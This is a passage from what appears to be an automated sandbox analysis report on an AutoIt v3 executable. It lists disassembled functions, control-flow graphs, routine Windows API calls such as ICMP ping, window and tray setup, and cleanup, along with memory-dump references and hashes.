                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 009934DE
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 009934ED
                                                                                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00993503
                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00993515
                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00993527
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0099353F
                                                                                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00993590
                                                                                                                                                                                                                                    • Part of subcall function 00993624: GetSysColorBrush.USER32(0000000F), ref: 00993657
                                                                                                                                                                                                                                    • Part of subcall function 00993624: RegisterClassExW.USER32(00000030), ref: 00993681
                                                                                                                                                                                                                                    • Part of subcall function 00993624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00993692
                                                                                                                                                                                                                                    • Part of subcall function 00993624: InitCommonControlsEx.COMCTL32(?), ref: 009936AF
                                                                                                                                                                                                                                    • Part of subcall function 00993624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009936BF
                                                                                                                                                                                                                                    • Part of subcall function 00993624: LoadIconW.USER32(000000A9), ref: 009936D5
                                                                                                                                                                                                                                    • Part of subcall function 00993624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009936E4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                  • Opcode ID: 0cc7adb710349332c404bf284d723ebea109c53f3d634a87c4b70f195b5ba549
                                                                                                                                                                                                                                  • Instruction ID: 955b621e7a298a1decbfd26809d0f91d8f9120eed48b00725f210b84af379f2d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc7adb710349332c404bf284d723ebea109c53f3d634a87c4b70f195b5ba549
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18210C71D10714ABDB10DFE9EC59BA97FB4FB48750F00402AE604BA3A1D7F945468F90
                                                                                                                                                                                                                                  Function 00A10FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 544 a10fb8-a10fef call 99e6a0 547 a10ff1-a10ffe call 99c98d 544->547 548 a1100f-a11021 WSAStartup 544->548 547->548 557 a11000-a1100b call 99c98d 547->557 550 a11023-a11031 548->550 551 a11054-a11091 call 9ac1f6 call 998ec0 call 9af9d4 inet_addr gethostbyname 548->551 554 a11033 550->554 555 a11036-a11046 550->555 567 a11093-a110a0 IcmpCreateFile 551->567 568 a110a2-a110b0 551->568 554->555 558 a11048 555->558 559 a1104b-a1104f 555->559 557->548 558->559 560 a11249-a11251 559->560 567->568 569 a110d3-a11100 call 9b017b call 99423c 567->569 570 a110b2 568->570 571 a110b5-a110c5 568->571 580 a11102-a11129 IcmpSendEcho 569->580 581 a1112b-a11148 IcmpSendEcho 569->581 570->571 572 a110c7 571->572 573 a110ca-a110ce 571->573 572->573 576 a11240-a11244 call 99bd98 573->576 576->560 582 a1114c-a1114e 580->582 581->582 583 a11150-a11155 582->583 584 a111ae-a111bc 582->584 587 a111f8-a1120a call 99e6a0 583->587 588 a1115b-a11160 583->588 585 a111c1-a111c8 584->585 586 a111be 584->586 589 a111e4-a111ed 585->589 586->585 602 a11210 587->602 603 a1120c-a1120e 587->603 590 a11162-a11167 588->590 591 a111ca-a111d8 588->591 595 a111f2-a111f6 589->595 596 a111ef 589->596 590->584 597 a11169-a1116e 590->597 593 a111da 591->593 594 a111dd 591->594 593->594 594->589 599 a11212-a11229 IcmpCloseHandle WSACleanup 595->599 596->595 600 a11170-a11175 597->600 601 a11193-a111a1 597->601 599->576 604 a1122b-a1123d call 9b013d call 9b0184 599->604 600->591 605 a11177-a11185 600->605 606 a111a3 601->606 607 a111a6-a111ac 601->607 602->599 603->599 604->576 609 a11187 605->609 610 a1118a-a11191 605->610 606->607 607->589 609->610 610->589
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00A11019
                                                                                                                                                                                                                                  • inet_addr.WSOCK32(?), ref: 00A11079
                                                                                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00A11085
                                                                                                                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00A11093
                                                                                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A11123
                                                                                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A11142
                                                                                                                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00A11216
                                                                                                                                                                                                                                  • WSACleanup.WSOCK32 ref: 00A1121C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                  • String ID: Ping
                                                                                                                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                  • Opcode ID: ec47fdf223d4b7a9f90cf00b421f779140ad94cfa246524941fef40d522b2d3a
                                                                                                                                                                                                                                  • Instruction ID: ec633c57e51b94fe5a9d6a0ee2ce2411f14cdf42d8db11bb9719492ae938a657
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec47fdf223d4b7a9f90cf00b421f779140ad94cfa246524941fef40d522b2d3a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F691A371604241AFD720DF19C884F56BBE0FF88318F1485ADF6658B6A2C735ED86CB81
                                                                                                                                                                                                                                  Function 0099370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 614 99370f-993724 615 993784-993786 614->615 616 993726-993729 614->616 615->616 619 993788 615->619 617 99372b-993732 616->617 618 99378a 616->618 622 993738-99373d 617->622 623 993804-99380c PostQuitMessage 617->623 620 9d3df4-9d3e1c call 992f92 call 9af23c 618->620 621 993790-993795 618->621 624 99376f-993777 DefWindowProcW 619->624 660 9d3e21-9d3e28 620->660 625 9937bc-9937e3 SetTimer RegisterWindowMessageW 621->625 626 993797-99379a 621->626 627 993743-993747 622->627 628 9d3e61-9d3e75 call 9fc8f7 622->628 631 9937b8-9937ba 623->631 630 99377d-993783 624->630 625->631 634 9937e5-9937f0 CreatePopupMenu 625->634 632 9d3d95-9d3d98 626->632 633 9937a0-9937b3 KillTimer call 993907 call 9959ff 626->633 635 99374d-993752 627->635 636 99380e-993818 call 9afcad 627->636 628->631 653 9d3e7b 628->653 631->630 639 9d3d9a-9d3d9e 632->639 640 9d3dd0-9d3def MoveWindow 632->640 633->631 634->631 642 993758-99375d 635->642 643 9d3e46-9d3e4d 635->643 655 99381d 636->655 647 9d3dbf-9d3dcb SetFocus 639->647 648 9d3da0-9d3da3 639->648 640->631 651 993763-993769 642->651 652 9937f2-993802 call 99381f 642->652 643->624 650 9d3e53-9d3e5c call 9f1423 643->650 647->631 648->651 656 9d3da9-9d3dba call 992f92 648->656 650->624 651->624 651->660 652->631 653->624 655->631 656->631 660->624 664 9d3e2e-9d3e41 call 993907 call 99396b 660->664 664->624
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00993709,?,?), ref: 00993777
                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00993709,?,?), ref: 009937A3
                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009937C6
                                                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00993709,?,?), ref: 009937D1
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 009937E5
                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00993806
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                  • Opcode ID: 4fb6e02152441cc6114449f918c93816a37f753c01d0bc8cf0ec192926513035
                                                                                                                                                                                                                                  • Instruction ID: 2d8a6aecbf878adef5e540b58f5c62d50735f98326db350c80fdb7ecd81ec688
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fb6e02152441cc6114449f918c93816a37f753c01d0bc8cf0ec192926513035
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 734105F5240644BBDF24AFFC9C4DB793A79E780301F04C625F502CA2A1DAB89F469762
                                                                                                                                                                                                                                  Function 00992AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 670 992ab0-992ae9 671 992aef-992b05 mciSendStringW 670->671 672 9d3a1a-9d3a1b DestroyWindow 670->672 673 992b0b-992b13 671->673 674 992d66-992d73 671->674 675 9d3a26-9d3a33 672->675 673->675 676 992b19-992b28 call 992ede 673->676 677 992d98-992d9f 674->677 678 992d75-992d90 UnregisterHotKey 674->678 679 9d3a35-9d3a38 675->679 680 9d3a62-9d3a69 675->680 691 992b2e-992b36 676->691 692 9d3a70-9d3a7c 676->692 677->673 683 992da5 677->683 678->677 682 992d92-992d93 call 992770 678->682 684 9d3a3a-9d3a42 call 997aab 679->684 685 9d3a44-9d3a47 FindClose 679->685 680->675 688 9d3a6b 680->688 682->677 683->674 690 9d3a4d-9d3a5a 684->690 685->690 688->692 690->680 696 9d3a5c-9d3a5d call a03cf6 690->696 697 992b3c-992b61 call 99e6a0 691->697 698 9d3a94-9d3aa1 691->698 693 9d3a7e-9d3a80 FreeLibrary 692->693 694 9d3a86-9d3a8d 692->694 693->694 694->692 699 9d3a8f 694->699 696->680 708 992b98-992ba3 OleUninitialize 697->708 709 992b63 697->709 700 9d3ac8-9d3acf 698->700 701 9d3aa3-9d3ac0 VirtualFree 698->701 699->698 700->698 705 9d3ad1 700->705 701->700 704 9d3ac2-9d3ac3 call a03d5c 701->704 704->700 711 9d3ad6-9d3ada 705->711 710 992ba9-992bae 708->710 708->711 712 992b66-992b96 call 9930c0 call 993069 709->712 713 9d3aeb-9d3af8 call a03d30 710->713 714 992bb4-992bbe 710->714 711->710 715 9d3ae0-9d3ae6 711->715 712->708 726 9d3afa 713->726 719 992bc4-992c45 call 99bd98 call 992ff4 call 992e85 call 9b0184 call 992e1c call 99bd98 call 99e6a0 call 992eae call 9b0184 714->719 720 992da7-992db4 call 9afb19 714->720 715->710 732 9d3aff-9d3b21 call 9b013d 719->732 760 992c4b-992c6f call 9b0184 719->760 720->719 730 992dba 720->730 726->732 730->720 738 9d3b23 732->738 741 9d3b28-9d3b4a call 9b013d 738->741 748 9d3b4c 741->748 751 9d3b51-9d3b73 call 9b013d 748->751 756 9d3b75 751->756 759 9d3b7a-9d3b87 call 9f6e3b 756->759 765 9d3b89 759->765 760->741 766 992c75-992c99 call 9b0184 760->766 768 9d3b8e-9d3b9b call 9abdf0 765->768 766->751 771 992c9f-992cb9 call 9b0184 766->771 775 9d3b9d 768->775 771->759 776 992cbf-992ce3 call 992e85 call 9b0184 771->776 778 9d3ba2-9d3baf call a03c8a 775->778 776->768 785 992ce9-992cf1 776->785 783 9d3bb1 778->783 786 9d3bb6-9d3bc3 call a03d11 783->786 785->778 787 992cf7-992d15 call 99bd98 call 992fba 785->787 792 9d3bc5 786->792 787->786 796 992d1b-992d29 787->796 795 9d3bca-9d3bd7 call a03d11 792->795 802 9d3bd9 795->802 796->795 798 992d2f-992d65 call 99bd98 * 3 call 992f26 796->798 802->802
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00992AF9
                                                                                                                                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00992B98
                                                                                                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00992D7D
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 009D3A1B
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 009D3A80
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009D3AAD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                  • String ID: close all
                                                                                                                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                  • Opcode ID: 834a9a3505a6cad4bdde08fb8448a5a5096525ce275b7be22d0e6e2dd5b430e0
                                                                                                                                                                                                                                  • Instruction ID: 55890e11532ab22606c09d5f8da26c756208f0ce75391542ccaae8a0018fbfaa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 834a9a3505a6cad4bdde08fb8448a5a5096525ce275b7be22d0e6e2dd5b430e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7ED17D71741212DFCB28EF58D985B69F7A4BF44711F1182AEE84A6B352CB30AD52CF41
                                                                                                                                                                                                                                  Function 009C90C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 809 9c90c5-9c90d5 810 9c90ef-9c90f1 809->810 811 9c90d7-9c90ea call 9bf636 call 9bf649 809->811 813 9c9459-9c9466 call 9bf636 call 9bf649 810->813 814 9c90f7-9c90fd 810->814 827 9c9471 811->827 832 9c946c call 9c2b5c 813->832 814->813 817 9c9103-9c912e 814->817 817->813 820 9c9134-9c913d 817->820 823 9c913f-9c9152 call 9bf636 call 9bf649 820->823 824 9c9157-9c9159 820->824 823->832 825 9c915f-9c9163 824->825 826 9c9455-9c9457 824->826 825->826 830 9c9169-9c916d 825->830 831 9c9474-9c9479 826->831 827->831 830->823 835 9c916f-9c9186 830->835 832->827 838 9c9188-9c918b 835->838 839 9c91a3-9c91ac 835->839 840 9c918d-9c9193 838->840 841 9c9195-9c919e 838->841 842 9c91ae-9c91c5 call 9bf636 call 9bf649 call 9c2b5c 839->842 843 9c91ca-9c91d4 839->843 840->841 840->842 846 9c923f-9c9259 841->846 871 9c938c 842->871 844 9c91db-9c91dc call 9c3b93 843->844 845 9c91d6-9c91d8 843->845 853 9c91e1-9c91f9 call 9c2d38 * 2 844->853 845->844 848 9c932d-9c9336 call 9cfc1b 846->848 849 9c925f-9c926f 846->849 862 9c9338-9c934a 848->862 863 9c93a9 848->863 849->848 852 9c9275-9c9277 849->852 852->848 856 9c927d-9c92a3 852->856 879 9c91fb-9c9211 call 9bf649 call 9bf636 853->879 880 9c9216-9c923c call 9c97a4 853->880 856->848 860 9c92a9-9c92bc 856->860 860->848 867 9c92be-9c92c0 860->867 862->863 865 9c934c-9c935b GetConsoleMode 862->865 869 9c93ad-9c93c5 ReadFile 863->869 865->863 870 9c935d-9c9361 865->870 867->848 872 9c92c2-9c92ed 867->872 874 9c93c7-9c93cd 869->874 875 9c9421-9c942c GetLastError 869->875 870->869 876 9c9363-9c937d ReadConsoleW 870->876 877 9c938f-9c9399 call 9c2d38 871->877 872->848 878 9c92ef-9c9302 872->878 874->875 883 9c93cf 874->883 881 9c942e-9c9440 call 9bf649 call 9bf636 875->881 882 9c9445-9c9448 875->882 886 9c939e-9c93a7 876->886 887 9c937f GetLastError 876->887 877->831 878->848 891 9c9304-9c9306 878->891 879->871 880->846 881->871 888 9c944e-9c9450 882->888 889 9c9385-9c938b call 9bf613 882->889 885 9c93d2-9c93e4 883->885 885->877 896 9c93e6-9c93ea 885->896 886->885 887->889 888->877 889->871 891->848 899 9c9308-9c9328 891->899 902 9c93ec-9c93fc call 9c8de1 896->902 903 9c9403-9c940e 896->903 899->848 914 9c93ff-9c9401 902->914 908 9c941a-9c941f call 9c8c21 903->908 909 9c9410 call 9c8f31 903->909 915 9c9415-9c9418 908->915 909->915 914->877 915->914
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bf2fd671122e1c1b8317465ccaee10bb7ece308cdcb414efe81421c6edf0ae70
                                                                                                                                                                                                                                  • Instruction ID: 6775b297f0f4fb2ad698ccdb7986a6ee368b02df77f80a8c79917ff8e40d1a4f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf2fd671122e1c1b8317465ccaee10bb7ece308cdcb414efe81421c6edf0ae70
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68C1D270D04289AFDF11DFE8D849FADBBB4AF49310F18415DE954AB3A2C7349942CB62
                                                                                                                                                                                                                                  Function 009AAC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 917 9aac3e-9ab063 call 998ec0 call 9abc58 call 99e6a0 924 9ab069-9ab073 917->924 925 9e8584-9e8591 917->925 928 9ab079-9ab07e 924->928 929 9e896b-9e8979 924->929 926 9e8596-9e85a5 925->926 927 9e8593 925->927 930 9e85aa 926->930 931 9e85a7 926->931 927->926 934 9e85b2-9e85b4 928->934 935 9ab084-9ab090 call 9ab5b6 928->935 932 9e897e 929->932 933 9e897b 929->933 930->934 931->930 936 9e8985-9e898e 932->936 933->932 940 9e85bd 934->940 935->940 942 9ab096-9ab0a3 call 99c98d 935->942 938 9e8993 936->938 939 9e8990 936->939 945 9e899c-9e89eb call 99e6a0 call 9abbbe * 2 938->945 939->938 944 9e85c7 940->944 948 9ab0ab-9ab0b4 942->948 949 9e85cf-9e85d2 944->949 978 9ab1e0-9ab1f5 945->978 979 9e89f1-9e8a03 call 9ab5b6 945->979 951 9ab0b8-9ab0d6 call 9b4d98 948->951 952 9ab158-9ab16f 949->952 953 9e85d8-9e8600 call 9b4cd3 call 997ad5 949->953 972 9ab0d8-9ab0e1 951->972 973 9ab0e5 951->973 955 9e8954-9e8957 952->955 956 9ab175 952->956 987 9e862d-9e8651 call 997b1a call 99bd98 953->987 988 9e8602-9e8606 953->988 961 9e895d-9e8960 955->961 962 9e8a41-9e8a79 call 99e6a0 call 9abbbe 955->962 963 9e88ff-9e8920 call 99e6a0 956->963 964 9ab17b-9ab17e 956->964 961->945 969 9e8962-9e8965 961->969 962->978 1013 9e8a7f-9e8a91 call 9ab5b6 962->1013 963->978 992 9e8926-9e8938 call 9ab5b6 963->992 970 9e8729-9e8743 call 9abbbe 964->970 971 9ab184-9ab187 964->971 969->929 969->978 999 9e888f-9e88b5 call 99e6a0 970->999 1000 9e8749-9e874c 970->1000 980 9e86ca-9e86e0 call 996c03 971->980 981 9ab18d-9ab190 971->981 972->951 982 9ab0e3 972->982 973->944 984 9ab0eb-9ab0fc 973->984 994 9ab1fb-9ab20b call 99e6a0 978->994 995 9e8ac9-9e8acf 978->995 1018 9e8a2f-9e8a3c call 99c98d 979->1018 1019 9e8a05-9e8a0d 979->1019 980->978 1016 9e86e6-9e86fc call 9ab5b6 980->1016 990 9e8656-9e8659 981->990 991 9ab196-9ab1b8 call 99e6a0 981->991 982->984 984->929 993 9ab102-9ab11c 984->993 987->990 988->987 1003 9e8608-9e862b call 99ad40 988->1003 990->929 1009 9e865f-9e8674 call 996c03 990->1009 991->978 1035 9ab1ba-9ab1cc call 9ab5b6 991->1035 1038 9e893a-9e8943 call 99c98d 992->1038 1039 9e8945 992->1039 993->949 1008 9ab122-9ab154 call 9abbbe call 99e6a0 993->1008 995->948 1001 9e8ad5 995->1001 999->978 1045 9e88bb-9e88cd call 9ab5b6 999->1045 1011 9e874e-9e8751 1000->1011 1012 9e87bf-9e87de call 99e6a0 1000->1012 1001->929 1003->987 1003->988 1008->952 1009->978 1042 9e867a-9e8690 call 9ab5b6 1009->1042 1025 9e8ada-9e8ae8 1011->1025 1026 9e8757-9e8774 call 99e6a0 1011->1026 1012->978 1063 9e87e4-9e87f6 call 9ab5b6 1012->1063 1059 9e8ab5-9e8abe call 99c98d 1013->1059 1060 9e8a93-9e8a9b 1013->1060 1064 9e86fe-9e870b call 998ec0 1016->1064 1065 9e870d-9e8716 call 998ec0 1016->1065 1071 9e8ac2-9e8ac4 1018->1071 1033 9e8a1e-9e8a29 call 99b4b1 1019->1033 1034 9e8a0f-9e8a13 1019->1034 1048 9e8aed-9e8afd 1025->1048 1049 9e8aea 1025->1049 1026->978 1074 9e877a-9e878c call 9ab5b6 1026->1074 1033->1018 1082 9e8b0b-9e8b19 1033->1082 1034->1033 1051 9e8a15-9e8a19 1034->1051 1083 9e86ba-9e86c3 call 99c98d 1035->1083 1084 9ab1d2-9ab1de 1035->1084 1041 9e8949-9e894f 1038->1041 1039->1041 1041->978 1085 9e869d-9e86ab call 998ec0 1042->1085 1086 9e8692-9e869b call 99c98d 1042->1086 1089 9e88de 1045->1089 1090 9e88cf-9e88dc call 99c98d 1045->1090 1066 9e8aff 1048->1066 1067 9e8b02-9e8b06 1048->1067 1049->1048 1068 9e8aa1-9e8aa3 1051->1068 1059->1071 1075 9e8a9d 1060->1075 1076 9e8aa8-9e8ab3 call 99b4b1 1060->1076 1063->978 1105 9e87fc-9e8805 call 9ab5b6 1063->1105 1106 9e8719-9e8724 call 998577 1064->1106 1065->1106 1066->1067 1067->994 1068->978 1071->978 1109 9e878e-9e879d call 99c98d 1074->1109 1110 9e879f 1074->1110 1075->1068 1076->1059 1076->1082 1095 9e8b1e-9e8b21 1082->1095 1096 9e8b1b 1082->1096 1083->980 1084->978 1116 9e86ae-9e86b5 1085->1116 1086->1116 1104 9e88e2-9e88e9 1089->1104 1090->1104 1095->936 1096->1095 1112 9e88eb-9e88f0 call 99396b 1104->1112 1113 9e88f5 call 993907 1104->1113 1127 9e8818 1105->1127 1128 9e8807-9e8816 call 99c98d 1105->1128 1106->978 1118 9e87a3-9e87ae call 9b9334 1109->1118 1110->1118 1112->978 1126 9e88fa 1113->1126 1116->978 1118->929 1132 9e87b4-9e87ba 1118->1132 1126->978 1131 9e881c-9e883f 1127->1131 1128->1131 1134 9e884d-9e8850 1131->1134 1135 9e8841-9e8848 1131->1135 1132->978 1136 9e8852-9e885b 1134->1136 1137 9e8860-9e8863 1134->1137 1135->1134 1136->1137 1138 9e8865-9e886e 1137->1138 1139 9e8873-9e8876 1137->1139 1138->1139 1139->978 1140 9e887c-9e888a 1139->1140 1140->978
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
